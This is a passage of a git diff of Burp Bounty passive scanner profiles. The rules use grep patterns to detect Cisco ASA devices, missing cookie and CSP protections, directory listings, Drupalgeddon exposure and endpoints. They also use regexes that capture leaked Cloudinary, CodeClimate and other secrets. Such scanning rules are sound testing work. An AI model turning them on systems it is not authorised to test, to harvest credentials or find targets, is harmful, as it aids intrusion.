"UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,+CSCOE+", + "true,Or,+CSCOT+" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Cisco ASA Device Found (Passive)", + "IssueSeverity": "Low", + "IssueConfidence": "Certain", + "IssueDetail": "Cisco ASA Device Found (Passive)", + "RemediationDetail": "Cisco ASA Device Found (Passive)", + "IssueBackground": "Cisco ASA Device Found (Passive)", + "RemediationBackground": "Cisco ASA Device Found (Passive)", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Cloudinary_Basic_Auth.bb b/profiles/Cloudinary_Basic_Auth.bb old mode 100644 new mode 100755 index 8b7a721..9691464 --- a/profiles/Cloudinary_Basic_Auth.bb +++ b/profiles/Cloudinary_Basic_Auth.bb @@ -1 +1,59 @@ -[{"Name":"Cloudinary_Basic_Auth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,cloudinary:\\/\\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Cloudinary Basic Auth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Cloudinary_Basic_Auth", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,cloudinary:\\/\\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Cloudinary Basic Auth", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CodeClimate_Key.bb b/profiles/CodeClimate_Key.bb old mode 100644 new mode 100755 index 95a138a..b57afea --- a/profiles/CodeClimate_Key.bb +++ b/profiles/CodeClimate_Key.bb @@ -1 +1,59 @@ -[{"Name":"CodeClimate_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)codeclima.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{64}(\\\\\\\"|\u0027|`)?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"CodeClimate Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "CodeClimate_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)codeclima.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{64}(\\\\\\\"|\u0027|`)?" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CodeClimate Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Content-Security-Policy.bb b/profiles/Content-Security-Policy.bb new file mode 100755 index 0000000..3992642 --- /dev/null +++ b/profiles/Content-Security-Policy.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "Content-Security-Policy", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Content-Security-Policy" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 1, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Content-Security-Policy", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Security Header \"Content-Security-Policy\" not present in response.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CookieAttrubute-HttpOnly.bb b/profiles/CookieAttrubute-HttpOnly.bb new file mode 100755 index 0000000..969486c --- /dev/null +++ b/profiles/CookieAttrubute-HttpOnly.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "CookieAttrubute-HttpOnly", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,set-cookie:\\s*(?!.*(httponly)).*" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CookieAttrubute-HttpOnly", + "IssueSeverity": "Low", + "IssueConfidence": "Firm", + "IssueDetail": "Cookie attribute \"HttpOnly\" not present: \u003cbr\u003e \u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CookieAttrubute-SameSite.bb b/profiles/CookieAttrubute-SameSite.bb new file mode 100755 index 0000000..2a2cae5 --- /dev/null +++ b/profiles/CookieAttrubute-SameSite.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "CookieAttrubute-SameSite", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,set-cookie:\\s*(?!.*(samesite)).*" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CookieAttrubute-SameSite", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Cookie attribute \"Samesite\" not present: \u003cbr\u003e \u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CookieAttrubute-Secure.bb b/profiles/CookieAttrubute-Secure.bb new file mode 100755 index 0000000..7448396 --- /dev/null +++ b/profiles/CookieAttrubute-Secure.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "CookieAttrubute-Secure", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,set-cookie:\\s*(?!.*(secure)).*" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "CookieAttrubute-Secure", + "IssueSeverity": "Low", + "IssueConfidence": "Firm", + "IssueDetail": "Cookie attribute \"secure\" not present: \u003cbr\u003e\u003cgrep\u003e\n\n", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Cookie_Security.bb b/profiles/Cookie_Security.bb deleted file mode 100644 index c7597d7..0000000 --- a/profiles/Cookie_Security.bb +++ /dev/null @@ -1 +0,0 @@ -[{"Name":"Cookie_Security","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,set-cookie:\\s*(?!.*(httponly)).*","true,Or,set-cookie:\\s*(?!.*(samesite)).*","true,Or,set-cookie:\\s*(?!.*(secure)).*"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Cookie Security flags","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Missing Security Flags (HTTPOnly,Secure or SameSite)","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file diff --git a/profiles/DefaultRDP.bb b/profiles/DefaultRDP.bb new file mode 100755 index 0000000..fc9d984 --- /dev/null +++ b/profiles/DefaultRDP.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "DefaultRDP", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,default.rdp" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "DefaultRDP", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Default RDP Found:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5023/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/DigitalOcean_Space_Discovered.bb b/profiles/DigitalOcean_Space_Discovered.bb old mode 100644 new mode 100755 index 91d7877..c67741a --- a/profiles/DigitalOcean_Space_Discovered.bb +++ b/profiles/DigitalOcean_Space_Discovered.bb @@ -1 +1,59 @@ -[{"Name":"DigitalOcean_Space_Discovered","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,http(?:s)://[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.digitaloceanspaces.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"DigitalOcean Space Discovered","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "DigitalOcean_Space_Discovered", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,http(?:s)://[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.digitaloceanspaces.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "DigitalOcean Space Discovered", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/DirectoryListing.bb b/profiles/DirectoryListing.bb new file mode 100755 index 0000000..e0d4f3c --- /dev/null +++ b/profiles/DirectoryListing.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "DirectoryListing", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Index of /" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "DirectoryListing", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Directory Listing found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Drupalgeddon.bb b/profiles/Drupalgeddon.bb new file mode 100755 index 0000000..4127638 --- /dev/null +++ b/profiles/Drupalgeddon.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "Drupalgeddon", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,\\/user\\/register.*Powered by Drupal" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Drupalgeddon", + "IssueSeverity": "High", + "IssueConfidence": "Firm", + "IssueDetail": "Possible Drupalgeddon 2 or 3:\u003cbr\u003e\n\n\u003cbr\u003ehttps://www.exploit-db.com/ghdb/4782/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44482/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44557/\n", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/EmailInput.bb b/profiles/EmailInput.bb old mode 100644 new mode 100755 index bbf2713..330f79e --- a/profiles/EmailInput.bb +++ b/profiles/EmailInput.bb @@ -1 +1,59 @@ -[{"Name":"EmailInput","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["type\u003demail"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"EmailInput","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Email Input Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "EmailInput", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,type\u003demail" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "EmailInput", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Email Input Found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/EndpointsExtractor.bb b/profiles/EndpointsExtractor.bb new file mode 100755 index 0000000..5a166b7 --- /dev/null +++ b/profiles/EndpointsExtractor.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "EndpointsExtractor", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@GochaOqradze", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "false,,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|\u0027]{0,}|)))(?:\"|\u0027)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": true, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "EndpointsExtractor", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Regex by Gerben_Javado : \n\u003cbr\u003ehttps://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py\n\n\u003cbr\u003e\u003cbr\u003eEndpoints: \u003cbr\u003e\u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Env_Vars.bb b/profiles/Env_Vars.bb old mode 100644 new mode 100755 index 39aed23..89a03f6 --- a/profiles/Env_Vars.bb +++ b/profiles/Env_Vars.bb @@ -1 +1,59 @@ -[{"Name":"Env_Vars","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)(apikey|secret|key|api|password|pass|pw|host)\u003d[0-9a-zA-Z-_.{}]{4,120}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Environment Variables","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Env_Vars", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)(apikey|secret|key|api|password|pass|pw|host)\u003d[0-9a-zA-Z-_.{}]{4,120}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Environment Variables", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/ErrorPages-JobApps.bb b/profiles/ErrorPages-JobApps.bb old mode 100644 new mode 100755 index 8f15352..91a12ed --- a/profiles/ErrorPages-JobApps.bb +++ b/profiles/ErrorPages-JobApps.bb @@ -1 +1,60 @@ 